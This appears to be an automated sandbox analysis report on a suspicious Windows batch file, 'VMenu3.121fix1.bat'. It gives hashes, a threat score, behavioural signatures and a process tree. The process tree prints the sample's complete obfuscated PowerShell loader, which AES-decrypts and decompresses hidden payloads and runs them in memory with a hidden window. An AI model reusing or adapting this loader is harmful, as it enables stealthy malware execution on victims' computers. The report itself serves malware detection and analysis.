Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 03:59
Static task
static1
Behavioral task
behavioral1
Sample
VMenu3.121fix1.bat
Resource
win7-20240903-en
5 signatures
150 seconds
General
-
Target
VMenu3.121fix1.bat
-
Size
527KB
-
MD5
3d1653ee332959fc6ea17400cdb636bd
-
SHA1
3a75f6b73477b63300bc1065caaa7c9af066b6b4
-
SHA256
fdb0641302824a729dcdbf6235a60a7661ee14951f82cc486cf0a874e8c38e1e
-
SHA512
6eaaf2c0cd2322dcb9fcd71d030afaabaf13b0ed881fafe8db569da5cb2e196147045105067b3d5dc9aa80d2c61d44d6f063b82c74f6954b5bb956e4597e0b06
-
SSDEEP
6144:BLG0TmgMe4wGS6I4LjSAeEP3xI0r+/nBkJgrICpdZGz2LDpb5uZ8OaE2i88tmKb4:BCZgMe46AeSBHoBigr3ZnLjmsi4xq/G
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2488 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2488 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2488 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1924 wrote to memory of 2504 1924 cmd.exe 31 PID 1924 wrote to memory of 2504 1924 cmd.exe 31 PID 1924 wrote to memory of 2504 1924 cmd.exe 31 PID 2504 wrote to memory of 2388 2504 net.exe 32 PID 2504 wrote to memory of 2388 2504 net.exe 32 PID 2504 wrote to memory of 2388 2504 net.exe 32 PID 1924 wrote to memory of 2368 1924 cmd.exe 33 PID 1924 wrote to memory of 2368 1924 cmd.exe 33 PID 1924 wrote to memory of 2368 1924 cmd.exe 33 PID 1924 wrote to memory of 2488 1924 cmd.exe 34 PID 1924 wrote to memory of 2488 1924 cmd.exe 34 PID 1924 wrote to memory of 2488 1924 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\VMenu3.121fix1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FUnCUHbp7bZ3aDt7EaVZSvFYhobW2XMUVK66Zb99X4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7RSYmNKHEzHJb8J9Ope6aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FmbNL=New-Object System.IO.MemoryStream(,$param_var); $RglAC=New-Object System.IO.MemoryStream; $acWbi=New-Object System.IO.Compression.GZipStream($FmbNL, [IO.Compression.CompressionMode]::Decompress); $acWbi.CopyTo($RglAC); $acWbi.Dispose(); $FmbNL.Dispose(); $RglAC.Dispose(); $RglAC.ToArray();}function execute_function($param_var,$param2_var){ $IsgCr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WIgyd=$IsgCr.EntryPoint; $WIgyd.Invoke($null, $param2_var);}$coheU = 'C:\Users\Admin\AppData\Local\Temp\VMenu3.121fix1.bat';$host.UI.RawUI.WindowTitle = $coheU;$MuzzS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($coheU).Split([Environment]::NewLine);foreach ($rWFCs in $MuzzS) { if ($rWFCs.StartsWith('AXBwvMvJcDRzRiGDBjAF')) { $FODgs=$rWFCs.Substring(20); break; }}$payloads_var=[string[]]$FODgs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488
-